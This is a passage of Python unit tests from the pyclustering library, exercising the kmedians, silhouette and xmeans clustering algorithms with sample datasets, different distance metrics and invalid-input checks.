KmediansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, [[3.7, 5.5], [6.7, 7.5]], [5, 5], False, metric=metric)
def testClusterAllocationSampleSimple1EuclideanSquare(self):
metric = distance_metric(type_metric.EUCLIDEAN_SQUARE)
KmediansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, [[3.7, 5.5], [6.7, 7.5]], [5, 5], False, metric=metric)
def testClusterAllocationSampleSimple1Manhattan(self):
metric = distance_metric(type_metric.MANHATTAN)
KmediansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, [[3.7, 5.5], [6.7, 7.5]], [5, 5], False, metric=metric)
def testClusterAllocationSampleSimple1Chebyshev(self):
metric = distance_metric(type_metric.CHEBYSHEV)
KmediansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, [[3.7, 5.5], [6.7, 7.5]], [5, 5], False, metric=metric)
def testClusterAllocationSampleSimple1Minkowski(self):
metric = distance_metric(type_metric.MINKOWSKI, degree=2.0)
KmediansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, [[3.7, 5.5], [6.7, 7.5]], [5, 5], False, metric=metric)
def testClusterAllocationSampleSimple1UserDefined(self):
metric = distance_metric(type_metric.USER_DEFINED, func=distance_metric(type_metric.EUCLIDEAN))
KmediansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, [[3.7, 5.5], [6.7, 7.5]], [5, 5], False, metric=metric)
def testClusterAllocationSample1NumpyArrayUserDefined(self):
metric = distance_metric(type_metric.USER_DEFINED, func=distance_metric(type_metric.EUCLIDEAN))
input_data = numpy.array(read_sample(SIMPLE_SAMPLES.SAMPLE_SIMPLE1))
initial_centers = numpy.array([[3.7, 5.5], [6.7, 7.5]])
KmediansTestTemplates.templateLengthProcessData(input_data, initial_centers, [5, 5], False, metric=metric)
def testClusterAllocationSample2NumpyArrayUserDefined(self):
metric = distance_metric(type_metric.USER_DEFINED, func=distance_metric(type_metric.EUCLIDEAN_SQUARE))
input_data = numpy.array(read_sample(SIMPLE_SAMPLES.SAMPLE_SIMPLE2))
initial_centers = numpy.array([[3.5, 4.8], [6.9, 7], [7.5, 0.5]])
KmediansTestTemplates.templateLengthProcessData(input_data, initial_centers, [10, 5, 8], False, metric=metric)
def testClusterOneAllocationSampleSimple1(self):
KmediansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, [[1.0, 2.5]], [10], False)
def testClusterAllocationSampleSimple2(self):
KmediansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE2, [[3.5, 4.8], [6.9, 7], [7.5, 0.5]], [10, 5, 8], False)
def testClusterOneAllocationSampleSimple2(self):
KmediansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE2, [[0.5, 0.2]], [23], False)
def testClusterAllocationSampleSimple3(self):
KmediansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE3, [[0.2, 0.1], [4.0, 1.0], [2.0, 2.0], [2.3, 3.9]], [10, 10, 10, 30], False)
def testClusterOneAllocationSampleSimple3(self):
KmediansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE3, [[0.2, 0.1]], [60], False)
def testClusterAllocationSampleSimple5(self):
KmediansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE5, [[0.0, 1.0], [0.0, 0.0], [1.0, 1.0], [1.0, 0.0]], [15, 15, 15, 15], False)
def testClusterOneAllocationSampleSimple5(self):
KmediansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE5, [[0.0, 0.0]], [60], False)
def testClusterAllocationSample1WrongInitialNumberCenters1(self):
KmediansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, [[2.8, 9.5], [3.5, 6.6], [1.3, 4.0]], None, False)
def testClusterAllocationSample1WrongInitialNumberCenters2(self):
KmediansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, [[2.8, 9.5], [3.5, 6.6], [1.3, 4.0], [1.2, 4.5]], None, False)
def testClusterAllocationSample2WrongInitialNumberCenters(self):
KmediansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE2, [[3.5, 4.8], [6.9, 7], [7.5, 0.5], [7.3, 4.5], [3.1, 5.4]], None, False)
def testClusterTheSameData1(self):
KmediansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE9, [ [4.1], [7.3] ], [10, 20], False)
def testClusterTheSameData2(self):
KmediansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE12, [ [1.1, 1.0], [3.0, 3.1], [5.0, 4.9] ], [5, 5, 5], False)
def testOddSize(self):
# Bug issue #428 (https://github.com/annoviko/pyclustering/issues/428)
data = [[59.00732, 9.748167], [59.00608, 9.749117], [59.0047, 9.749933]]
KmediansTestTemplates.templateLengthProcessData(data, [[59.00732, 9.748167], [59.00608, 9.749117]], None, False, tolerance=10)
def testDifferentDimensions(self):
kmedians_instance = kmedians([ [0, 1, 5], [0, 2, 3] ], [ [0, 3] ], ccore=False)
self.assertRaises(NameError, kmedians_instance.process)
def testClusterAllocationOneDimensionData(self):
KmediansTestTemplates.templateClusterAllocationOneDimensionData(False)
def testClusterAllocationTheSameObjectsOneInitialCenter(self):
KmediansTestTemplates.templateClusterAllocationTheSameObjects(20, 1, False)
def testClusterAllocationTheSameObjectsTwoInitialCenters(self):
KmediansTestTemplates.templateClusterAllocationTheSameObjects(15, 2, False)
def testClusterAllocationTheSameObjectsThreeInitialCenters(self):
KmediansTestTemplates.templateClusterAllocationTheSameObjects(25, 3, False)
def testClusterAllocationSampleRoughMediansSimple10(self):
initial_medians = [[0.0772944481804071, 0.05224990900863469], [1.6021689021213712, 1.0347579135245601], [2.3341008076636096, 1.280022869739064]]
KmediansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE10, initial_medians, None, False)
def testTotalWCESimple4(self):
sample = [[0, 1, 5], [7, 8, 9], [0, 2, 3], [4, 5, 6]]
initial_medians = [[0, 3, 2], [4, 6, 5]]
kmedians_instance = kmedians(sample, initial_medians, ccore=False)
self.assertNotEqual(self, kmedians_instance.get_total_wce(), 16.0)
def testPredictOnePoint(self):
centers = [[0.2, 0.1], [4.0, 1.0], [2.0, 2.0], [2.3, 3.9]]
KmediansTestTemplates.templatePredict(SIMPLE_SAMPLES.SAMPLE_SIMPLE3, centers, [[0.3, 0.2]], [0], False)
KmediansTestTemplates.templatePredict(SIMPLE_SAMPLES.SAMPLE_SIMPLE3, centers, [[4.1, 1.1]], [1], False)
KmediansTestTemplates.templatePredict(SIMPLE_SAMPLES.SAMPLE_SIMPLE3, centers, [[2.1, 1.9]], [2], False)
KmediansTestTemplates.templatePredict(SIMPLE_SAMPLES.SAMPLE_SIMPLE3, centers, [[2.1, 4.1]], [3], False)
def testPredictOnePointUserMetric(self):
centers = [[0.2, 0.1], [4.0, 1.0], [2.0, 2.0], [2.3, 3.9]]
metric = distance_metric(type_metric.USER_DEFINED, func=distance_metric(type_metric.EUCLIDEAN))
KmediansTestTemplates.templatePredict(SIMPLE_SAMPLES.SAMPLE_SIMPLE3, centers, [[0.3, 0.2]], [0], False, metric=metric)
def testPredictTwoPoints(self):
centers = [[0.2, 0.1], [4.0, 1.0], [2.0, 2.0], [2.3, 3.9]]
KmediansTestTemplates.templatePredict(SIMPLE_SAMPLES.SAMPLE_SIMPLE3, centers, [[0.3, 0.2], [2.1, 1.9]], [0, 2], False)
KmediansTestTemplates.templatePredict(SIMPLE_SAMPLES.SAMPLE_SIMPLE3, centers, [[2.1, 4.1], [2.1, 1.9]], [3, 2], False)
def testPredictTwoPointsUserMetric(self):
centers = [[0.2, 0.1], [4.0, 1.0], [2.0, 2.0], [2.3, 3.9]]
metric = distance_metric(type_metric.USER_DEFINED, func=distance_metric(type_metric.EUCLIDEAN))
KmediansTestTemplates.templatePredict(SIMPLE_SAMPLES.SAMPLE_SIMPLE3, centers, [[0.3, 0.2], [2.1, 1.9]], [0, 2], False, metric=metric)
def testPredictFourPoints(self):
centers = [[0.2, 0.1], [4.0, 1.0], [2.0, 2.0], [2.3, 3.9]]
to_predict = [[0.3, 0.2], [4.1, 1.1], [2.1, 1.9], [2.1, 4.1]]
KmediansTestTemplates.templatePredict(SIMPLE_SAMPLES.SAMPLE_SIMPLE3, centers, to_predict, [0, 1, 2, 3], False)
def testPredictFivePoints(self):
centers = [[0.2, 0.1], [4.0, 1.0], [2.0, 2.0], [2.3, 3.9]]
to_predict = [[0.3, 0.2], [4.1, 1.1], [3.9, 1.1], [2.1, 1.9], [2.1, 4.1]]
KmediansTestTemplates.templatePredict(SIMPLE_SAMPLES.SAMPLE_SIMPLE3, centers, to_predict, [0, 1, 1, 2, 3], False)
def testPredictFivePointsUserMetric(self):
centers = [[0.2, 0.1], [4.0, 1.0], [2.0, 2.0], [2.3, 3.9]]
to_predict = [[0.3, 0.2], [4.1, 1.1], [3.9, 1.1], [2.1, 1.9], [2.1, 4.1]]
metric = distance_metric(type_metric.USER_DEFINED, func=distance_metric(type_metric.EUCLIDEAN))
KmediansTestTemplates.templatePredict(SIMPLE_SAMPLES.SAMPLE_SIMPLE3, centers, to_predict, [0, 1, 1, 2, 3], False, metric=metric)
def testItermax0(self):
KmediansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, [[3.7, 5.5], [6.7, 7.5]], [], False, itermax=0)
def testItermax1(self):
KmediansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, [[3.7, 5.5], [6.7, 7.5]], [5, 5], False, itermax=1)
def testItermax10Simple01(self):
KmediansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, [[3.7, 5.5], [6.7, 7.5]], [5, 5], False, itermax=10)
def testItermax10Simple02(self):
KmediansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE2, [[3.5, 4.8], [6.9, 7], [7.5, 0.5]], [10, 5, 8], False, itermax=10)
def test_incorrect_data(self):
self.assertRaises(ValueError, kmedians, [], [[1]])
def test_incorrect_centers(self):
self.assertRaises(ValueError, kmedians, [[0], [1], [2]], [])
def test_incorrect_tolerance(self):
self.assertRaises(ValueError, kmedians, [[0], [1], [2]], [[1]], -1.0)
def test_incorrect_itermax(self):
self.assertRaises(ValueError, kmedians, [[0], [1], [2]], [[1]], itermax=-5)
```
#### File: tests/unit/ut_silhouette.py
```python
import unittest
# Generate images without having a window appear.
import matplotlib
matplotlib.use('Agg')
from pyclustering.cluster.silhouette import silhouette, silhouette_ksearch_type
from pyclustering.cluster.tests.silhouette_templates import silhouette_test_template
from pyclustering.samples.definitions import SIMPLE_SAMPLES, SIMPLE_ANSWERS
class silhouette_unit_tests(unittest.TestCase):
def test_correct_score_simple01(self):
silhouette_test_template.correct_scores(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, SIMPLE_ANSWERS.ANSWER_SIMPLE1, False)
def test_correct_score_simple02(self):
silhouette_test_template.correct_scores(SIMPLE_SAMPLES.SAMPLE_SIMPLE2, SIMPLE_ANSWERS.ANSWER_SIMPLE2, False)
def test_correct_score_simple03(self):
silhouette_test_template.correct_scores(SIMPLE_SAMPLES.SAMPLE_SIMPLE3, SIMPLE_ANSWERS.ANSWER_SIMPLE3, False)
def test_correct_score_simple04(self):
silhouette_test_template.correct_scores(SIMPLE_SAMPLES.SAMPLE_SIMPLE4, SIMPLE_ANSWERS.ANSWER_SIMPLE4, False)
def test_correct_score_simple05(self):
silhouette_test_template.correct_scores(SIMPLE_SAMPLES.SAMPLE_SIMPLE5, SIMPLE_ANSWERS.ANSWER_SIMPLE5, False)
def test_correct_score_simple06(self):
silhouette_test_template.correct_scores(SIMPLE_SAMPLES.SAMPLE_SIMPLE6, SIMPLE_ANSWERS.ANSWER_SIMPLE6, False)
def test_correct_score_simple07(self):
silhouette_test_template.correct_scores(SIMPLE_SAMPLES.SAMPLE_SIMPLE7, SIMPLE_ANSWERS.ANSWER_SIMPLE7, False)
def test_correct_score_simple08(self):
silhouette_test_template.correct_scores(SIMPLE_SAMPLES.SAMPLE_SIMPLE8, SIMPLE_ANSWERS.ANSWER_SIMPLE8, False)
def test_correct_ksearch_simple01(self):
silhouette_test_template.correct_ksearch(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, SIMPLE_ANSWERS.ANSWER_SIMPLE1, 2, 10,
silhouette_ksearch_type.KMEANS, False)
def test_correct_ksearch_simple01_kmedoids(self):
silhouette_test_template.correct_ksearch(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, SIMPLE_ANSWERS.ANSWER_SIMPLE1, 2, 10,
silhouette_ksearch_type.KMEDOIDS, False)
def test_correct_ksearch_simple01_kmedians(self):
silhouette_test_template.correct_ksearch(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, SIMPLE_ANSWERS.ANSWER_SIMPLE1, 2, 10,
silhouette_ksearch_type.KMEDIANS, False)
def test_correct_ksearch_simple02(self):
silhouette_test_template.correct_ksearch(SIMPLE_SAMPLES.SAMPLE_SIMPLE2, SIMPLE_ANSWERS.ANSWER_SIMPLE2, 2, 10,
silhouette_ksearch_type.KMEANS, False)
def test_correct_ksearch_simple02_kmedoids(self):
silhouette_test_template.correct_ksearch(SIMPLE_SAMPLES.SAMPLE_SIMPLE2, SIMPLE_ANSWERS.ANSWER_SIMPLE2, 2, 10,
silhouette_ksearch_type.KMEDOIDS, False)
def test_correct_ksearch_simple02_kmedians(self):
silhouette_test_template.correct_ksearch(SIMPLE_SAMPLES.SAMPLE_SIMPLE2, SIMPLE_ANSWERS.ANSWER_SIMPLE2, 2, 10,
silhouette_ksearch_type.KMEDIANS, False)
def test_correct_ksearch_simple03(self):
silhouette_test_template.correct_ksearch(SIMPLE_SAMPLES.SAMPLE_SIMPLE3, SIMPLE_ANSWERS.ANSWER_SIMPLE3, 2, 10,
silhouette_ksearch_type.KMEANS, False)
def test_correct_ksearch_simple03_kmedoids(self):
silhouette_test_template.correct_ksearch(SIMPLE_SAMPLES.SAMPLE_SIMPLE3, SIMPLE_ANSWERS.ANSWER_SIMPLE3, 2, 10,
silhouette_ksearch_type.KMEDOIDS, False)
def test_correct_ksearch_simple03_kmedians(self):
silhouette_test_template.correct_ksearch(SIMPLE_SAMPLES.SAMPLE_SIMPLE3, SIMPLE_ANSWERS.ANSWER_SIMPLE3, 2, 10,
silhouette_ksearch_type.KMEDIANS, False)
def test_correct_ksearch_simple05(self):
silhouette_test_template.correct_ksearch(SIMPLE_SAMPLES.SAMPLE_SIMPLE5, SIMPLE_ANSWERS.ANSWER_SIMPLE5, 2, 10,
silhouette_ksearch_type.KMEANS, False)
def test_correct_ksearch_simple06(self):
silhouette_test_template.correct_ksearch(SIMPLE_SAMPLES.SAMPLE_SIMPLE6, SIMPLE_ANSWERS.ANSWER_SIMPLE6, 2, 10,
silhouette_ksearch_type.KMEANS, False)
def test_correct_ksearch_simple07(self):
silhouette_test_template.correct_ksearch(SIMPLE_SAMPLES.SAMPLE_SIMPLE7, SIMPLE_ANSWERS.ANSWER_SIMPLE7, 2, 10,
silhouette_ksearch_type.KMEANS, False)
def test_correct_ksearch_simple08(self):
silhouette_test_template.correct_ksearch(SIMPLE_SAMPLES.SAMPLE_SIMPLE8, SIMPLE_ANSWERS.ANSWER_SIMPLE8, 2, 10,
silhouette_ksearch_type.KMEANS, False)
def test_correct_ksearch_simple09(self):
silhouette_test_template.correct_ksearch(SIMPLE_SAMPLES.SAMPLE_SIMPLE9, SIMPLE_ANSWERS.ANSWER_SIMPLE9, 2, 10,
silhouette_ksearch_type.KMEANS, False)
def test_correct_ksearch_simple10(self):
silhouette_test_template.correct_ksearch(SIMPLE_SAMPLES.SAMPLE_SIMPLE10, SIMPLE_ANSWERS.ANSWER_SIMPLE10, 2, 10,
silhouette_ksearch_type.KMEANS, False)
def test_correct_ksearch_simple11(self):
silhouette_test_template.correct_ksearch(SIMPLE_SAMPLES.SAMPLE_SIMPLE11, SIMPLE_ANSWERS.ANSWER_SIMPLE11, 2, 10,
silhouette_ksearch_type.KMEANS, False)
def test_correct_ksearch_simple12(self):
silhouette_test_template.correct_ksearch(SIMPLE_SAMPLES.SAMPLE_SIMPLE12, SIMPLE_ANSWERS.ANSWER_SIMPLE12, 2, 10,
silhouette_ksearch_type.KMEANS, False)
def test_correct_ksearch_simple13(self):
silhouette_test_template.correct_ksearch(SIMPLE_SAMPLES.SAMPLE_SIMPLE13, SIMPLE_ANSWERS.ANSWER_SIMPLE13, 2, 10,
silhouette_ksearch_type.KMEANS, False)
def test_distance_matrix_sample01(self):
silhouette_test_template.correct_processing_data_types(SIMPLE_SAMPLES.SAMPLE_SIMPLE1,
SIMPLE_ANSWERS.ANSWER_SIMPLE1, False)
def test_distance_matrix_sample02(self):
silhouette_test_template.correct_processing_data_types(SIMPLE_SAMPLES.SAMPLE_SIMPLE2,
SIMPLE_ANSWERS.ANSWER_SIMPLE2, False)
def test_distance_matrix_sample03(self):
silhouette_test_template.correct_processing_data_types(SIMPLE_SAMPLES.SAMPLE_SIMPLE3,
SIMPLE_ANSWERS.ANSWER_SIMPLE3, False)
def test_distance_matrix_sample04(self):
silhouette_test_template.correct_processing_data_types(SIMPLE_SAMPLES.SAMPLE_SIMPLE4,
SIMPLE_ANSWERS.ANSWER_SIMPLE4, False)
def test_distance_matrix_sample05(self):
silhouette_test_template.correct_processing_data_types(SIMPLE_SAMPLES.SAMPLE_SIMPLE5,
SIMPLE_ANSWERS.ANSWER_SIMPLE5, False)
def test_distance_matrix_sample06(self):
silhouette_test_template.correct_processing_data_types(SIMPLE_SAMPLES.SAMPLE_SIMPLE6,
SIMPLE_ANSWERS.ANSWER_SIMPLE6, False)
def test_distance_matrix_sample07(self):
silhouette_test_template.correct_processing_data_types(SIMPLE_SAMPLES.SAMPLE_SIMPLE7,
SIMPLE_ANSWERS.ANSWER_SIMPLE7, False)
def test_random_state_1_kmeans(self):
silhouette_test_template.random_state(2, 10, silhouette_ksearch_type.KMEANS, 1, False)
def test_random_state_2_kmeans(self):
silhouette_test_template.random_state(2, 10, silhouette_ksearch_type.KMEANS, 2, False)
def test_random_state_4_kmeans(self):
silhouette_test_template.random_state(2, 10, silhouette_ksearch_type.KMEANS, 4, False)
def test_random_state_8_kmeans(self):
silhouette_test_template.random_state(2, 10, silhouette_ksearch_type.KMEANS, 8, False)
def test_random_state_16_kmeans(self):
silhouette_test_template.random_state(2, 10, silhouette_ksearch_type.KMEANS, 16, False)
def test_random_state_128_kmeans(self):
silhouette_test_template.random_state(2, 10, silhouette_ksearch_type.KMEANS, 128, False)
def test_random_state_1024_kmeans(self):
silhouette_test_template.random_state(2, 10, silhouette_ksearch_type.KMEANS, 1024, False)
def test_random_state_1_kmedians(self):
silhouette_test_template.random_state(2, 10, silhouette_ksearch_type.KMEDIANS, 1, False)
def test_random_state_2_kmedians(self):
silhouette_test_template.random_state(2, 10, silhouette_ksearch_type.KMEDIANS, 2, False)
def test_random_state_4_kmedians(self):
silhouette_test_template.random_state(2, 10, silhouette_ksearch_type.KMEDIANS, 4, False)
def test_random_state_128_kmedians(self):
silhouette_test_template.random_state(2, 10, silhouette_ksearch_type.KMEDIANS, 128, False)
def test_random_state_1024_kmedians(self):
silhouette_test_template.random_state(2, 10, silhouette_ksearch_type.KMEDIANS, 1024, False)
def test_random_state_1_kmedoids(self):
silhouette_test_template.random_state(2, 10, silhouette_ksearch_type.KMEDOIDS, 1, False)
def test_random_state_2_kmedoids(self):
silhouette_test_template.random_state(2, 10, silhouette_ksearch_type.KMEDIANS, 2, False)
def test_random_state_4_kmedoids(self):
silhouette_test_template.random_state(2, 10, silhouette_ksearch_type.KMEDIANS, 4, False)
def test_random_state_128_kmedoids(self):
silhouette_test_template.random_state(2, 10, silhouette_ksearch_type.KMEDIANS, 128, False)
def test_random_state_1024_kmedoids(self):
silhouette_test_template.random_state(2, 10, silhouette_ksearch_type.KMEDIANS, 1024, False)
def test_incorrect_data(self):
self.assertRaises(ValueError, silhouette, [], [[1, 2], [3, 4]])
def test_incorrect_clusters(self):
self.assertRaises(ValueError, silhouette, [[1], [2], [3], [4]], [])
```
#### File: tests/unit/ut_xmeans.py
```python
import unittest
# Generate images without having a window appear.
import matplotlib
matplotlib.use('Agg')
from pyclustering.cluster.tests.xmeans_templates import XmeansTestTemplates
from pyclustering.cluster.xmeans import xmeans, splitting_type
from pyclustering.samples.definitions import SIMPLE_SAMPLES, FCPS_SAMPLES
from pyclustering.utils import read_sample
from pyclustering.utils.metric import distance_metric, type_metric
class XmeansUnitTest(unittest.TestCase):
def testBicClusterAllocationSampleSimple1(self):
XmeansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, [[3.7, 5.5], [6.7, 7.5]], [5, 5], splitting_type.BAYESIAN_INFORMATION_CRITERION, 20, False)
def testBicClusterAllocationSampleSimple1Repeat(self):
XmeansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, [[3.7, 5.5], [6.7, 7.5]], [5, 5], splitting_type.BAYESIAN_INFORMATION_CRITERION, 20, False, repeat=5)
def testBicSampleSimple1WithoutInitialCenters(self):
XmeansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, None, [5, 5], splitting_type.BAYESIAN_INFORMATION_CRITERION, 20, False)
def testBicSampleSimple1WithoutInitialCentersRepeat(self):
XmeansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, None, [5, 5], splitting_type.BAYESIAN_INFORMATION_CRITERION, 20, False, repeat=3)
def testBicSampleSimple1MaxLessReal(self):
XmeansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, [[3.7, 5.5]], None, splitting_type.BAYESIAN_INFORMATION_CRITERION, 1, False)
def testBicSampleSimple1MaxLessRealRepeat(self):
XmeansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, [[3.7, 5.5]], None, splitting_type.BAYESIAN_INFORMATION_CRITERION, 1, False, repeat=5)
def testBicClusterAllocationSampleSimple1MetricEuclidean(self):
metric = distance_metric(type_metric.EUCLIDEAN)
XmeansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, [[3.7, 5.5], [6.7, 7.5]], [5, 5], splitting_type.BAYESIAN_INFORMATION_CRITERION, 20, False, metric=metric)
def testBicClusterAllocationSampleSimple1MetricEuclideanSquare(self):
metric = distance_metric(type_metric.EUCLIDEAN_SQUARE)
XmeansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, [[3.7, 5.5], [6.7, 7.5]], [5, 5], splitting_type.BAYESIAN_INFORMATION_CRITERION, 20, False, metric=metric)
def testBicClusterAllocationSampleSimple1MetricManhattan(self):
metric = distance_metric(type_metric.MANHATTAN)
XmeansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, [[3.7, 5.5], [6.7, 7.5]], [5, 5], splitting_type.BAYESIAN_INFORMATION_CRITERION, 20, False, metric=metric)
def testBicClusterAllocationSampleSimple1MetricChebyshev(self):
metric = distance_metric(type_metric.CHEBYSHEV)
XmeansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, [[3.7, 5.5], [6.7, 7.5]], [5, 5], splitting_type.BAYESIAN_INFORMATION_CRITERION, 20, False, metric=metric)
def testBicClusterAllocationSampleSimple1MetricMinkowski2(self):
metric = distance_metric(type_metric.MINKOWSKI, degree=2)
XmeansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, [[3.7, 5.5], [6.7, 7.5]], [5, 5], splitting_type.BAYESIAN_INFORMATION_CRITERION, 20, False, metric=metric)
def testBicClusterAllocationSampleSimple1MetricMinkowski4(self):
metric = distance_metric(type_metric.MINKOWSKI, degree=4)
XmeansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, [[3.7, 5.5], [6.7, 7.5]], [5, 5], splitting_type.BAYESIAN_INFORMATION_CRITERION, 20, False, metric=metric)
def testBicClusterAllocationSampleSimple1MetricCanberra(self):
metric = distance_metric(type_metric.CANBERRA)
XmeansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, [[3.7, 5.5], [6.7, 7.5]], [5, 5], splitting_type.BAYESIAN_INFORMATION_CRITERION, 20, False, metric=metric)
def testBicClusterAllocationSampleSimple1MetricChiSquare(self):
metric = distance_metric(type_metric.CHI_SQUARE)
XmeansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, [[3.7, 5.5], [6.7, 7.5]], [5, 5], splitting_type.BAYESIAN_INFORMATION_CRITERION, 20, False, metric=metric)
def testBicClusterAllocationSampleSimple1MetricGower(self):
metric = distance_metric(type_metric.GOWER, data=read_sample(SIMPLE_SAMPLES.SAMPLE_SIMPLE1))
XmeansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, [[3.7, 5.5], [6.7, 7.5]], [5, 5], splitting_type.BAYESIAN_INFORMATION_CRITERION, 20, False, metric=metric)
def testMndlClusterAllocationSampleSimple1MetricEuclidean(self):
metric = distance_metric(type_metric.EUCLIDEAN)
XmeansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, [[3.7, 5.5], [6.7, 7.5]], [5, 5], splitting_type.MINIMUM_NOISELESS_DESCRIPTION_LENGTH, 20, False, metric=metric)
def testMndlClusterAllocationSampleSimple1MetricEuclideanSquare(self):
metric = distance_metric(type_metric.EUCLIDEAN_SQUARE)
XmeansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, [[3.7, 5.5], [6.7, 7.5]], [5, 5], splitting_type.MINIMUM_NOISELESS_DESCRIPTION_LENGTH, 20, False, metric=metric, alpha=0.1, beta=0.1)
def testMndlClusterAllocationSampleSimple1MetricManhattan(self):
metric = distance_metric(type_metric.MANHATTAN)
XmeansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, [[3.7, 5.5], [6.7, 7.5]], [5, 5], splitting_type.MINIMUM_NOISELESS_DESCRIPTION_LENGTH, 20, False, metric=metric)
def testMndlClusterAllocationSampleSimple1MetricChebyshev(self):
metric = distance_metric(type_metric.CHEBYSHEV)
XmeansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, [[3.7, 5.5], [6.7, 7.5]], [5, 5], splitting_type.MINIMUM_NOISELESS_DESCRIPTION_LENGTH, 20, False, metric=metric)
def testMndlClusterAllocationSampleSimple1MetricMinkowski2(self):
metric = distance_metric(type_metric.MINKOWSKI, degree=2)
XmeansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, [[3.7, 5.5], [6.7, 7.5]], [5, 5], splitting_type.MINIMUM_NOISELESS_DESCRIPTION_LENGTH, 20, False, metric=metric)
def testMndlClusterAllocationSampleSimple1MetricMinkowski4(self):
metric = distance_metric(type_metric.MINKOWSKI, degree=4)
XmeansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, [[3.7, 5.5], [6.7, 7.5]], [5, 5], splitting_type.MINIMUM_NOISELESS_DESCRIPTION_LENGTH, 20, False, metric=metric)
def testMndlClusterAllocationSampleSimple1MetricCanberra(self):
metric = distance_metric(type_metric.CANBERRA)
XmeansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, [[3.7, 5.5], [6.7, 7.5]], [5, 5], splitting_type.MINIMUM_NOISELESS_DESCRIPTION_LENGTH, 20, False, metric=metric)
def testMndlClusterAllocationSampleSimple1MetricChiSquare(self):
metric = distance_metric(type_metric.CHI_SQUARE)
XmeansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, [[3.7, 5.5], [6.7, 7.5]], [5, 5], splitting_type.MINIMUM_NOISELESS_DESCRIPTION_LENGTH, 20, False, metric=metric, alpha=0.1, beta=0.1, random_state=1000)
def testMndlClusterAllocationSampleSimple1MetricGower(self):
metric = distance_metric(type_metric.GOWER, data=read_sample(SIMPLE_SAMPLES.SAMPLE_SIMPLE1))
XmeansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, [[3.7, 5.5], [6.7, 7.5]], [5, 5], splitting_type.MINIMUM_NOISELESS_DESCRIPTION_LENGTH, 20, False, metric=metric)
def testBicWrongStartClusterAllocationSampleSimple1(self):
XmeansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, [[3.7, 5.5]], [5, 5], splitting_type.BAYESIAN_INFORMATION_CRITERION, 20, False)
def testMndlClusterAllocationSampleSimple1(self):
XmeansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, [[3.7, 5.5], [6.7, 7.5]], [5, 5], splitting_type.MINIMUM_NOISELESS_DESCRIPTION_LENGTH, 20, False, alpha=0.1, beta=0.1)
def testMndlSampleSimple1WithoutInitialCenters(self):
